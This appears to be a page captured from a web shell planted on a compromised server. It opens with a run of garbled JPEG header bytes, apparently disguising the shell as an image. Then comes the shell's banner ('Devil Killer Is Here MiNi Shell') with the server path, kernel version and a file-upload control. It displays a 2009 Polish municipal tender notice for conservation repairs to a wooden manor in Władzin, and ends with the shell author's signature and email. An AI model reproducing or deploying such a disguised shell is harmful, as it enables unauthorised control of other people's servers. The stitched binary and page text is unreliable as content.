JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/229204-N-2009.html

<p class="kh_header"><b>Uchanie: Remont konserwatorski budynku drewnianego dworu we Władzinie - Bokinia, gm. Uchanie I-etap</b><br>
<b>Numer ogłoszenia: 229204 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Uchanie , ul. Partyzantów 1, 22-510 Uchanie, woj. lubelskie, tel. 084 6577012, faks 084 6577122.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont konserwatorski budynku drewnianego dworu we Władzinie - Bokinia, gm. Uchanie I-etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zadaniu przewidziane jest wykonanie  n/w robót:
-	Prace wstępne - izba duża 
-	Wymiana fundamentów 
-	Wymiana podwalin i naprawa ścian 
-	Schody zewnętrzne i kolumny ganku wschodniego 
-	Schody zewnętrzne od strony zachodniej
-	Opaska żwirowa i niwelacja terenu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W postępowaniu wymagane jest wniesienie wadium przetargowego w kwocie 
1 500,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków  udziału w  postępowaniu  oraz  opis  sposobu  dokonywania  oceny  spełniania  tych warunków (art. 36. ust. 1 pkt 5) 
1.	O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków określonych w art. 22 ust. 1 Ustawy, złożone na druku stanowiącym Załącznik Nr 2 do SIWZ tj: 
1)	Posiadający uprawnienia do wykonywania określonej działalności  lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	Posiadający  niezbędna  wiedzę  i  doświadczenie  oraz  dysponujący  potencjałem  technicznym  i  osobami zdolnymi do wykonania zamówienia; 
3)	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4)	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 
2.	Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: 
1)	nie  spełniają  warunków  udziału  w  postępowaniu  o  zamówienie  publiczne  z  art.  22  Prawa  zamówień publicznych opisanych w § 5 ust1 pkt. 1-4. 
2)	podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych. 
3)	wykonywali  bezpośrednio  czynności  związane  z  przygotowaniem  prowadzonego  postępowania,  lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu  tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
4)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego   postępowania.  
5)	nie  złożyli  oświadczenia  o  spełnianiu  warunków  udziału  w  postępowaniu  lub  dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych. 
6)	nie  wnieśli  wadium,  w  tym  również  na  przedłużony  okres  związania  ofertą,  lub  nie  zgodzili  się  na przedłużenie okresu związania ofertą.  
 
3.	Zamawiający odrzuca ofertę jeżeli (art. 89 Pzp) 
1)	jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,  
2)	jej  złożenie  stanowi  czyn  nieuczciwej  konkurencji  w  rozumieniu  przepisów  o  zwalczaniu  nieuczciwej konkurencji  
3)	zawiera rażąco niską cenę w stosunku do przedmiotu zamrowienia,   
4)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia  lub nie zaproszonego do składania ofert  
5)	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88 Pzp  lub błędy w obliczeniu ceny  
6)	wykonawca w  terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził  się na poprawienie omyłki rachunkowej w obliczeniu ceny  
7)	jest nieważna na podstawie odrębnych przepisów,  

4.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
5.	Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. 
6.	Wykonawca musi wykazać spełnienie każdego z warunków.  
7.	Niespełnienie któregokolwiek z warunków spowoduje wykluczenie wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz  oświadczeń  lub  dokumentów,  jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia spełniania warunków udziału w postępowaniu (art. 36. ust. 1 pkt 6): 
      1.  Na ofertę składają się następujące dokumenty i załączniki:  
1)	Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik nr 1 do swiz 
2)	Oświadczenia o spełnianiu warunków udziału w postępowaniu załącznik nr 2 do siwz 
3)	Kosztorys ofertowy opracowany na podstawie załączonego do siwz przedmiaru  robót (zał. nr 3 do swiz), podpisany przez wykonawcę, który jest podstawą do określenia ceny oferty . 
4)	Wykaz  osób  i  podmiotów,  które  będą wykonywać  zamówienia  lub  będą  uczestniczyć w wykonywaniu zamówienia załącznik nr 4 do  siwz  
5)	Parafowany przez Wykonawcę wzór umowy - załącznik nr   5 do swiz 
6)	Kopia dokumentu potwierdzającego wniesienie wadium 
7)	Wykaz wykonanych robót w zakresie remontów budynków  w  okresie  ostatnich  5  lat  przed  dniem  wszczęcia  postępowania  o  udzielenie zamówienia publicznego tj. przed terminem publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie, Do  wykazu  Wykonawca  zobowiązany  jest  dołączyć  dokumenty  potwierdzające,  że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.). 
2.	W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest załączyć do oferty następujące oświadczenia lub dokumenty: 
1)	oświadczenie o spełnianiu warunków określonych w  art.  22  ust.  1  Ustawy,  złożone na  druku stanowiącym Załącznik Nr 2 do SIWZ, 
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  zgłoszenia  do  ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3)	dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o  ile  fakt ten nie wynika z przedstawionych dokumentów rejestrowych, wymienionych wyżej, 
4)	kopia dokumentu potwierdzającego wniesienie wadium;
3.	dysponują zaświadczeniami potwierdzającymi uregulowanie zobowiązań wobec US, ZUS lub KRUS, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza  terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: w ust. 1 pkt 2) (odpis z właściwego rejestru lub zaświadczenie o  wpisie  do  ewidencji  działalności  gospodarczej),  składa  dokument  lub  dokumenty,  wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
4.	Jeżeli w kraju pochodzenia  osoby  lub  w  kraju,  w  którym  wykonawca  ma  siedzibę  lub  miejsce zamieszkania  nie  wydaje  się  dokumentów,  o  których  mowa  w  ust.  1,  zastępuje  się  je  dokumentem zawierającym  oświadczenie  złożone  przed  notariuszem,  właściwym  organem  sądowym, administracyjnym  albo  organem  samorządu  zawodowego  lub  gospodarczego  odpowiednio  kraju pochodzenia  osoby  lub  kraju,  w  którym  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania. 
Postanowienia ust. 3 stosuje się odpowiednio. 
5.	Dokumenty (opisane w ust. 1 ) są składane w formie oryginału  lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
6.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, sporządzonym lub poświadczonym przez tłumacza przysięgłego. 
7.	Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości co do jej prawdziwości. 
Udział w postępowaniu wykonawców występujących wspólnie: 
1.	Wykonawcy  mogą  wspólnie  ubiegać  się  o  udzielenie  zamówienia. W tym  przypadku Wykonawcy powinni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. 
2.	Do  oferty  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  należy  dołączyć dokument  ustanawiający  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  albo  do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.  
3.	W  przypadku  ubiegania  się  o  udzielenie  zamówienia  przez wspólników  Spółki Cywilnej,  do  oferty można  załączyć  zamiast  pełnomocnictwa,  umowę  spółki  cywilnej  lub  uchwałę  wspólników  spółki cywilnej, określających sposób reprezentowania i zaciągania zobowiązań. 
4.	Wykonawcy  występujący  wspólnie  składają  jeden  Formularz  ofertowy  załącznik  
nr  1  oraz  jeden komplet dokumentów wymaganych SIWZ. 
5.	Każdy  z  wykonawców  występujących  wspólnie musi  złożyć  oświadczenie  i  dokumenty,  o  których mowa w § 6 ust.2 pkt.1 i 2 oraz odpowiednio w ust.3 i 5. Pozostałe dokumenty uczestnicy wspólnej oferty składają wspólnie. 
6.	Jeżeli  oferta  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  zostanie  wybrana, przed  zawarciem  umowy  na  roboty  budowlane  Wykonawca  zobowiązany  jest  przedłożyć  umowę regulującą współpracę tych wykonawców.  
7.	Postanowienia  SIWZ  dotyczące  Wykonawcy  stosuje  się  odpowiednio  do  wykonawców  wspólnie ubiegających się o udzielenie zamówienia.  
 
8.	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.  
 
9.	  W  celu  potwierdzenia  opisanego  przez  zamawiającego  warunku  posiadania  przez  wykonawcę niezbędnej wiedzy  i doświadczenia oraz   dysponowania potencjałem technicznym  i osobami zdolnymi do wykonywania zamówienia, zamawiający Sąda: 
 
1)	Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat  ich  kwalifikacji  zawodowych  i  wykształcenia  niezbędnych  do  wykonywania  zamówienia,  a  także zakresu  wykonywanych  przez  nich  czynności  załącznik  nr  4  do  siwz    .  Przedmiotowy  wykaz  winien obejmować co najmniej:
a.	Kierownika  robót budowlanych o specjalności konstrukcyjno budowlanych z min. 5 letnim stażem pracy  niezbędnych do wykonania zamówienia wraz z odpowiednimi  uprawnieniami  budowlanymi  i  zaświadczeniem  o  przynależności  do  Okręgowej  Izby Inżynierów Budownictwa. 
2)	Wykazu wykonanych robót w zakresie wykonania remontów budynków w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego tj. przed terminem publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.). 
 
10.	Ocena  spełniania  warunków  udziału  w  postępowaniu  prowadzona  będzie  na  podstawie  oświadczeń Wykonawcy oraz analizy dokumentów załączonych do oferty. 

11.	Dokumenty  potwierdzające,  że  oferowane  materiały  lub  urządzenia  odpowiadają  wymaganiom określonym przez Zamawiającego  - w przypadku oferowania  rozwiązań  równoważnych opisywanych przez Zamawiającego. 

12.	Wykonawca  składa wszystkie  dokumenty w  formie  oryginału  lub  kopii  poświadczonej  za  zgodność  z oryginałem przez wykonawcę.  

13.	W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienio(ą)e w dokumentach rejestracyjnych (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału, poświadczonej za zgodność z oryginałem kopii przez notariusza, adwokata, radcę prawnego lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejestracyjnego (ewidencyjnego) Wykonawcy, zgodnie ze sposobem reprezentacji określonym w tym dokumentach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> uchanie.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Uchanie
ul. Partyzantów 1
22-510 Uchanie
pokój nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 10:00, miejsce: Urząd Gminy Uchanie
ul. Partyzantów 1
22-510 Uchanie
pokój nr 8 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com